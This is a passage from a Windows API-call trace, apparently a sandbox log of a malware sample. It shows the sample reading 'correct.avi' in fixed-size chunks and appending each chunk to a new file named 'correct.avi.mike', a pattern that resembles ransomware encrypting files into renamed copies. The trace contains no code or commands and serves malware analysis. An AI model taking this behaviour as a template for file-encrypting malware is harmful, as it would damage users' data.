SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.549] GetFileType (hFile=0x264) returned 0x1 [0044.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.549] GetFileType (hFile=0x264) returned 0x1 [0044.549] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0044.549] ReadFile (in: hFile=0x264, lpBuffer=0x221bbf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x221bbf8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.549] CloseHandle (hObject=0x264) returned 1 [0044.549] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.550] GetFileType (hFile=0x264) returned 0x1 [0044.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.550] GetFileType (hFile=0x264) returned 0x1 [0044.550] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0044.550] WriteFile (in: hFile=0x264, lpBuffer=0x2226160*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2226160*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.550] CloseHandle (hObject=0x264) returned 1 [0044.551] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.551] GetFileType (hFile=0x264) returned 0x1 [0044.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.551] GetFileType (hFile=0x264) returned 0x1 [0044.551] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0044.551] ReadFile (in: hFile=0x264, lpBuffer=0x2228bb0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2228bb0*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.552] CloseHandle (hObject=0x264) returned 1 [0044.552] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.552] GetFileType (hFile=0x264) returned 0x1 [0044.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.552] GetFileType (hFile=0x264) returned 0x1 [0044.552] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0044.553] WriteFile (in: hFile=0x264, lpBuffer=0x2233118*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2233118*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.553] CloseHandle (hObject=0x264) returned 1 [0044.554] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.554] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.554] GetFileType (hFile=0x264) returned 0x1 [0044.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.554] GetFileType (hFile=0x264) returned 0x1 [0044.554] SetFilePointer (in: hFile=0x264, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0044.554] ReadFile (in: hFile=0x264, lpBuffer=0x2235b68, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2235b68*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.554] CloseHandle (hObject=0x264) returned 1 [0044.555] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.555] GetFileType (hFile=0x264) returned 0x1 [0044.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.555] GetFileType (hFile=0x264) returned 0x1 [0044.555] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0044.555] WriteFile (in: hFile=0x264, lpBuffer=0x22400d0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22400d0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.556] CloseHandle (hObject=0x264) returned 1 [0044.556] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.557] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.557] GetFileType (hFile=0x264) returned 0x1 [0044.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.557] GetFileType (hFile=0x264) returned 0x1 [0044.557] SetFilePointer (in: hFile=0x264, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0044.557] ReadFile (in: hFile=0x264, lpBuffer=0x2242b20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2242b20*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.557] CloseHandle (hObject=0x264) returned 1 [0044.558] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.558] GetFileType (hFile=0x264) returned 0x1 [0044.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.558] GetFileType (hFile=0x264) returned 0x1 [0044.558] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0044.558] WriteFile (in: hFile=0x264, lpBuffer=0x224d088*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x224d088*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.558] CloseHandle (hObject=0x264) returned 1 [0044.559] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.559] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.559] GetFileType (hFile=0x264) returned 0x1 [0044.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.559] GetFileType (hFile=0x264) returned 0x1 [0044.560] SetFilePointer (in: hFile=0x264, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0044.560] ReadFile (in: hFile=0x264, lpBuffer=0x224fad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x224fad8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.560] CloseHandle (hObject=0x264) returned 1 [0044.560] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.561] GetFileType (hFile=0x264) returned 0x1 [0044.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.561] GetFileType (hFile=0x264) returned 0x1 [0044.561] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0044.561] WriteFile (in: hFile=0x264, lpBuffer=0x225a040*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x225a040*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.563] CloseHandle (hObject=0x264) returned 1 [0044.564] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.564] GetFileType (hFile=0x264) returned 0x1 [0044.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.564] GetFileType (hFile=0x264) returned 0x1 [0044.565] SetFilePointer (in: hFile=0x264, lDistanceToMove=61440, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xf000 [0044.565] ReadFile (in: hFile=0x264, lpBuffer=0x225ca90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x225ca90*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.565] CloseHandle (hObject=0x264) returned 1 [0044.565] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.565] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.566] GetFileType (hFile=0x264) returned 0x1 [0044.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.566] GetFileType (hFile=0x264) returned 0x1 [0044.566] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xf220 [0044.566] WriteFile (in: hFile=0x264, lpBuffer=0x2266ff8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2266ff8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.566] CloseHandle (hObject=0x264) returned 1 [0044.567] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.567] GetFileType (hFile=0x264) returned 0x1 [0044.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.567] GetFileType (hFile=0x264) returned 0x1 [0044.567] SetFilePointer (in: hFile=0x264, lDistanceToMove=71680, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x11800 [0044.567] ReadFile (in: hFile=0x264, lpBuffer=0x2269a48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2269a48*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.567] CloseHandle (hObject=0x264) returned 1 [0044.568] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.568] GetFileType (hFile=0x264) returned 0x1 [0044.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.568] GetFileType (hFile=0x264) returned 0x1 [0044.568] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x11a20 [0044.569] WriteFile (in: hFile=0x264, lpBuffer=0x2273fb0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2273fb0*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.569] CloseHandle (hObject=0x264) returned 1 [0044.570] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.570] GetFileType (hFile=0x264) returned 0x1 [0044.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.570] GetFileType (hFile=0x264) returned 0x1 [0044.570] SetFilePointer (in: hFile=0x264, lDistanceToMove=81920, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x14000 [0044.570] ReadFile (in: hFile=0x264, lpBuffer=0x2276a00, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2276a00*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.570] CloseHandle (hObject=0x264) returned 1 [0044.571] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.571] GetFileType (hFile=0x264) returned 0x1 [0044.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.571] GetFileType (hFile=0x264) returned 0x1 [0044.571] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x14220 [0044.571] WriteFile (in: hFile=0x264, lpBuffer=0x2280f68*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2280f68*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.679] CloseHandle (hObject=0x264) returned 1 [0044.681] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.681] GetFileType (hFile=0x264) returned 0x1 [0044.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.681] GetFileType (hFile=0x264) returned 0x1 [0044.681] SetFilePointer (in: hFile=0x264, lDistanceToMove=92160, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x16800 [0044.681] ReadFile (in: hFile=0x264, lpBuffer=0x22839b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22839b8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.682] CloseHandle (hObject=0x264) returned 1 [0044.683] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike", lpFilePart=0x0) returned 0x49 [0044.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.683] GetFileType (hFile=0x264) returned 0x1 [0044.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.683] GetFileType (hFile=0x264) returned 0x1 [0044.683] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x16a20 [0044.683] WriteFile (in: hFile=0x264, lpBuffer=0x228df20*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x228df20*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0044.684] CloseHandle (hObject=0x264) returned 1 [0044.685] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", lpFilePart=0x0) returned 0x44 [0044.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.685] GetFileType (hFile=0x264) returned 0x1 [0044.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.685] GetFileType (hFile=0x264) returned 0x1 [0044.685] SetFilePointer (in: hFile=0x264, lDistanceToMove=102400, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x19000 [0044.685] ReadFile (in: hFile=0x264, lpBuffer=0x2290970, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: 